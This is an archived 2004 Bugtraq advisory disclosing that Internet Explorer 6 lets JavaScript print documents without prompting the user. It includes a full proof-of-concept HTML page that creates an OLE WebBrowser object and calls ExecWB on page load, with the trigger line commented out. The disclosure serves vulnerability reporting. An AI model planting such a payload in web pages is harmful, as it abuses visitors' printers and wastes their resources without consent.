lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <407AAB80.9020904@comcast.net>
Date: Mon, 12 Apr 2004 10:45:20 -0400
From: Ben Garvey <bengarvey@...cast.net>
To: bugtraq@...urityfocus.com
Subject: IE 6 Print Without Prompt


#######################################################################

                              Ben Garvey

Application:  Microsoft Internet Explorer

Versions:     6.0
Platforms:    Windows
Bugs:         IE 6 allows JavaScript to send documents to the printer 
without prompting the user.
Exploitation: Client
Date:         12 April 2004
Author:       Ben Garvey
	      bengarvey@...cast.net
               http://www.bengarvey.com

	      Bugtraq report format:  Thanks Luigi Auriemma!


#######################################################################

===============
1) Introduction
===============


Microsoft Internet Explorer is the dominant web browser on the world's PCs.
Any exploits or bugs found hurt millions of users.
Like anyone here needed to know that or is surprised.

#######################################################################

===============
2) Bug summary
===============

Using an OLE object, JavaScript, and HTML, IE 6 will allow a malicious
document to send pages to the printer without prompting the user.

Printing documents without prompting the user could result in the waste
of paper, toner, ink or result in damage to the printer.  If inserted into
a high traffic website this waste could be substantial.

$ of paper x printed sheets x web traffic x % of IE Users = $total waste 
in paper

If paper costs a penny per sheet ($5 for 500 sheets)
We average about 10 sheets printed per user before they realize what's 
happening (conservative estimate)
It's used on a high traffic website (1 million unique visitors)
IE's market share is about 90%.

$0.01 x 10 per user x 1 million x 0.90 = $90,000 in damages

This doesn't even include costs associated with toner and time.


===============
3) Exploit
===============

The following is an example of the exploit.  The offending line must be 
uncommented to activate it.  Remove any linebreaks that break the 
JavaScript.

<HTML>
<HEAD>

<SCRIPT language="JavaScript">

function ieExecWB( intOLEcmd, intOLEparam )
{        // Create OLE Object
          var WebBrowser = '<OBJECT ID="WebBrowser1" WIDTH=0 HEIGHT=0 
CLASSID="CLSID:8856F961-340A-11D0-A96B-00C04FD705A2"></OBJECT>';

          // Place Object on page
          document.body.insertAdjacentHTML('beforeEnd', WebBrowser);

          // if intOLEparam is not defined, set it
          if ( ( ! intOLEparam ) || ( intOLEparam < -1 )  || ( 
intOLEparam > 1) )
           intOLEparam = 1;

          // Execute Object
          WebBrowser1.ExecWB( intOLEcmd, intOLEparam );

          // Destroy Object
          WebBrowser1.outerHTML = "";
}

function printAll()
{	
	// Uncomment this to enable the exploit!
	//ieExecWB(6,-1);

}

</SCRIPT>

</HEAD>

<BODY onload="printAll()">

<h3>I like your PRINTER</h3>

</BODY>

</HTML>

===============
4) Conclusion
===============

I can't think of any reasonable use for allowing IE to print stuff 
without my permission.
This bug should be fixed as soon as possible.


-----
Ben Garvey
bengarvey@...cast.net
http://www.bengarvey.com



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ